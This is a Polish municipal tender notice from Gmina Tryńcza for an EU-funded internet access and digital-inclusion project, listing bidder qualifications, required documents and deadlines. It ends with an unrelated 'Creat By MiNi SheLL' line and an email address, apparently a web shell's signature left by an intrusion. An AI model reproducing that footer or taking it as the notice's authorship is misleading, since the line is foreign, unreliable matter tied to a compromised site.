<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. W celu uznania przez  Zamawiającego warunku za spełniony :
 a) Wykonawca musi być uprawniony do wykonywania gospodarczej działalności telekomunikacyjnej w rozumieniu ustawy Prawo telekomunikacyjne z dnia 16 lipca 2004 r. (Dz.U. Nr 171, poz. 1800 ze zm.) przynajmniej w zakresie świadczenia usług telekomunikacyjnych rozumianego jako sprzedaż we własnym imieniu i na własny rachunek usługi telekomunikacyjnej wykonywanej przez innego dostawcę usług i przynajmniej na obszarze prowadzenia działalności telekomunikacyjnej obejmującym granice administracyjne Gminy Tryńcza.  
b) UWAGA! W przypadku wykonawców, którzy nie będą dokonywać zakupu łącza dostępu do Internetu, lecz będą świadczyć usługę dostępu do Internetu bezpośrednio, za pomocą własnej sieci lub z wykorzystaniem sieci innego operatora,  nie stosuje się postanowień pod lit. a) powyżej. W przypadku wykonawców, którzy nie będą dokonywać zakupu łącza dostępu do Internetu, lecz będą świadczyć usługę dostępu do Internetu bezpośrednio, za pomocą własnej sieci, wykonawcy ci muszą być uprawnieni do wykonywania gospodarczej działalności telekomunikacyjnej w rozumieniu ustawy Prawo telekomunikacyjne z dnia 16 lipca 2004 r. (Dz.U. Nr 171, poz. 1800 ze zm.) przynajmniej w zakresie świadczenia usług telekomunikacyjnych rozumianego jako wykonywanie usług za pomocą własnej sieci lub z wykorzystaniem sieci innego operatora i przynajmniej na obszarze prowadzenia działalności telekomunikacyjnej obejmującym granice administracyjne Gminy Tryńcza.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek dotyczący posiadania wiedzy i doświadczenia. Warunek będzie uznany za spełniony jeżeli:
a) Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej dwie usługi (przy czym zakończony okres świadczenia tych usług musi wynosić co najmniej 1 rok) polegającą na: 
- nadzorze nad obsługą administrowania i serwisowania lub administrowaniu  i serwisowaniu  szerokopasmową infrastrukturą telekomunikacyjną, w tym prowadzeniu nadzoru nad prawidłowym korzystaniem z sygnału internetowego (przeciwdziałanie nieuprawnionemu korzystaniu z sygnału) przez co najmniej 100 odbiorców
- zapewnieniu łącza dostępu do Internetu i dostarczeniu go do co najmniej 100  odbiorców końcowych oraz bieżącym utrzymaniu łączy internetowych, 
- kontroli i bieżącym serwisowaniu zestawów komputerowych, będących w użytkowaniu u co najmniej 100 osób, w zakresie sprzętu, oprogramowania,
- monitorowaniu wskaźników i wykonaniu rozliczeń projektu, w tym zapotrzebowań na środki finansowe, aktualizacji harmonogramu rzeczowo - finansowego oraz rozliczenia końcowego, dla projektu całkowicie zakończonego i rozliczonego, o wartości co najmniej 500.000,00 PLN brutto każdy, zgodnie ze źródłami danych do prezentacji wskaźników zawartych we wniosku aplikacyjnym. 
Na potwierdzenie powyższego Wykonawca wykaże dwie albo większą ilością usług, przy czym łącznie zakres usług musi obejmować wszystkie ww. elementy. 
b) Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie usługi (przy czym zamawiający wymaga, aby usługi były całkowicie zakończone i rozliczone) polegającą na: 
- wykonaniu strony www (portalu internetowego)
- przeprowadzeniu kampanii promocyjnej, w tym wykonaniu materiałów promocyjnych  dla projektu w liczbie 500 sztuk (plakatów, ulotek i minimum jednej tablicy promocyjnej , oraz zamieszczeniu minimum jednego ogłoszenia w prasie na temat realizowanego projektu.
- wykonaniu adaptacji  pomieszczeń dla celów instalacji sprzętu komputerowego, w tym z wykonaniem prac instalacyjnych
- wykonaniu szkoleń lub cyklów szkoleń dla dzieci, młodzieży oraz osób dorosłych, w liczbie co najmniej 40 godzin łącznie dla co najmniej 100 uczestników łącznie  (w tym co najmniej 5 osób niepełnosprawnych o znacznym lub umiarkowanym stopniu niepełnosprawności), z zakresu: obsługa komputera, obsługa Internetu;
Na potwierdzenie powyższego Wykonawca wykaże dwie albo większą ilością usług, przy czym łącznie zakres usług musi obejmować wszystkie ww. elementy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek dotyczący dysonowania osobami zdolnymi do wykonania zamówienia. 
Zamawiający wymaga w szczególności dysponowania zespołem składającym się minimum z dwóch osób (w tym lider), przy zachowaniu warunku, że jedna osoba może łączyć kilka funkcji z niżej wymienionych: 
a)	Lider zespołu posiada następujące kwalifikacje: wykształcenie wyższe, oraz co najmniej 1 rok doświadczenia zawodowego dotyczącego zarządzania realizacją przedsięwzięć teleinformatycznych o wartości nie mniejszej niż 500.000 PLN oraz posiadanie ukończonego, co najmniej jednego szkolenia z zakresu zarządzania projektami,
b)	Ekspert ds. społeczeństwa informacyjnego, posiada następujące kwalifikacje: wykształcenie wyższe, oraz co najmniej roczne doświadczenie zawodowe, w planowaniu i realizacji co najmniej 1 projektu związanego z rozwojem społeczeństwa informacyjnego
c)	Ekspert ds. dostępu do Internetu, wykształcenie: co najmniej średnie, co najmniej 1 rok doświadczenia zawodowego w zakresie instalacji i konfiguracji  urządzeń dostępu do Internetu 
d)	Osoba ds. promocji, posiada co najmniej roczne doświadczenie z zakresu promocji lub marketingu.
e)	Ekspert ds. technicznych w zakresie przygotowania i realizacji przedsięwzięć teleinformatycznych, posiada następujące kwalifikacje: wykształcenie wyższe techniczne w kierunku telekomunikacji, posiada nie mniej niż 1 rok doświadczenia zawodowego, dotyczącego zarządzania, projektowania i realizacji przedsięwzięć teleinformatycznych
f)	Ekspert ds. szkoleń, posiada kwalifikacje z zakresu powadzenia zajęć dydaktycznych i szkoleniowych na poziomie uprawnień trenera / egzaminatora ECDL lub poziomie równoważnym, tj. w obszarze zastosowań komputerów i technologii informatycznych
g)	Ekspert ds. nadzoru BHP, posiada następujące kwalifikacje: wykształcenie co najmniej średnie, co najmniej 1 rok doświadczenia zawodowego,  posiada uprawnienia  do wdrażania systemu BHP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Zamawiający wymaga:
a) posiadania przez wykonawcę środków finansowych lub zdolności kredytowej na kwotę nie niższą niż 200 000,00 PLN;
b) posiadania przez wykonawcę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę co najmniej 200.000,00PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Oświadczenie o oddaniu do dyspozycji niezbędnych zasobów - jeżeli dotyczy-
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (zgodnie z wymaganiami określonymi rozdz. 6.4 SIWZ);
2)Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3) ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Terminy wystawienia dokumentów zastępowanych oświadczeniem stosuje się odpowiednio</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następującym zakresie i sytuacjach:
a)	zmiany terminu wykonania, w przypadku:
-zaistnienia zdarzeń uniemożliwiających (np. zdarzeń losowych, niesprzyjających warunków atmosferycznych, działania siły wyższej) wykonanie umowy w terminie, o którym mowa w §3 z przyczyn niezależnych od wykonawcy lub zamawiającego, udokumentowanych w sposób nie budzący zastrzeżeń, potwierdzonych protokolarnie,
-gdy zajdzie konieczność udzielenia zamówień dodatkowych w rozumieniu art. 67 ust. 1 pkt 5 ustawy Pzp.
b)innych postanowień za porozumieniem stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.tryncza.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Tryńcza, 37-204 Tryńcza 127, pokój Nr 4 - parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2014 godzina 09:00, miejsce: Urząd Gminy Tryńcza, 37-204 Tryńcza 127 (sekretariat - pokój Nr 11 - piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013; 8.Oś Priorytetowa: Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki, - Działanie 8.3: Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com